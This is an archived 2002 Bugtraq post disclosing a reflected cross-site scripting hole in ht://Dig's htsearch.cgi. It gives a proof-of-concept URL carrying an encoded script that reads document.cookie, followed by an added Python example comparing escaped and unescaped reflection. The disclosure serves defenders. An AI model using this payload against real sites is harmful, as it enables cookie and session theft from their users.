XSS in HTDIG

From: Howard Yeend (h_bugtraqat_private)
Date: Wed Jun 26 2002 - 01:38:48 PDT


    E.g.:
    
    http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
    
    (all URLs must be on one line)
    
    Apologies if this is a known issue.
    Apologies also for posting about XSS, but
    this is not an isolated website; it is a commonly
    used service.
    
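Added example, not part of the original post and not ht://Dig's own code: it decodes the `words` parameter from the URL posted above and compares a verbatim reflection with an HTML-escaped one. The `TEMPLATE` fragment and all function names are assumptions made for illustration; the post does not show where htsearch places the term in its output.

```python
import html
from urllib.parse import urlsplit, parse_qs

# URL exactly as posted in the message above.
POSTED_URL = ("http://www.anyhost.com/cgi-bin/htsearch.cgi?words="
              "%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E")

# Hypothetical results-page fragment (assumption): the search term is
# echoed back inside a double-quoted attribute value.
TEMPLATE = '<input type="text" name="words" value="{words}">'


def search_words(url):
    """Return the percent-decoded `words` parameter of a search URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("words", [""])[0]


def render_unescaped(words):
    """Reflect the term verbatim, the behaviour the report describes."""
    return TEMPLATE.format(words=words)


def render_escaped(words):
    """Reflect the term with &, <, >, " and ' encoded as HTML entities."""
    return TEMPLATE.format(words=html.escape(words, quote=True))


def breaks_out_of_attribute(fragment):
    """True if the reflected value closed the value="..." attribute early."""
    start = fragment.index('value="') + len('value="')
    end = fragment.index('"', start)
    # In a safe rendering the first quote after the value is the template's
    # own closing quote, so nothing but '">' may follow it.
    return fragment[end:] != '">'


if __name__ == "__main__":
    term = search_words(POSTED_URL)
    print("decoded term:", term)
    for render in (render_unescaped, render_escaped):
        out = render(term)
        print(render.__name__, breaks_out_of_attribute(out), out)
```

The same check can be pointed at a saved response body from a deployed search page to confirm whether the term comes back entity-encoded.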
    



    This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 22:13:15 PDT